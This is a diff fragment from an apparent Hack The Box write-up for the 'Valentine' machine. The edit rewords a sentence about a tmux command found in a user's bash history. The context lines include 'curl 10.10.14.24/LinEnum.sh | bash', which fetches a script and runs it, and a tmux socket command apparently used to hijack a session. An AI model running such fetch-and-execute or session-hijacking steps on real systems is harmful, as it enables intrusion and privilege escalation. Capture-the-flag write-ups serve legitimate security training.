Kyuu-Ji/htb-write-up/valentine/write-up-valentine.md

 curl 10.10.14.24/LinEnum.sh | bash
 ```

-After analyzing the results, there are contents in the bash history of that user in the _.bash_history_ file where he executed **tmux**:
+After analyzing the results, there are contents in the _./bash_history_ file of that user where he executed **tmux**:
 ```markdown
 tmux -S /.devs/dev_sess
 ```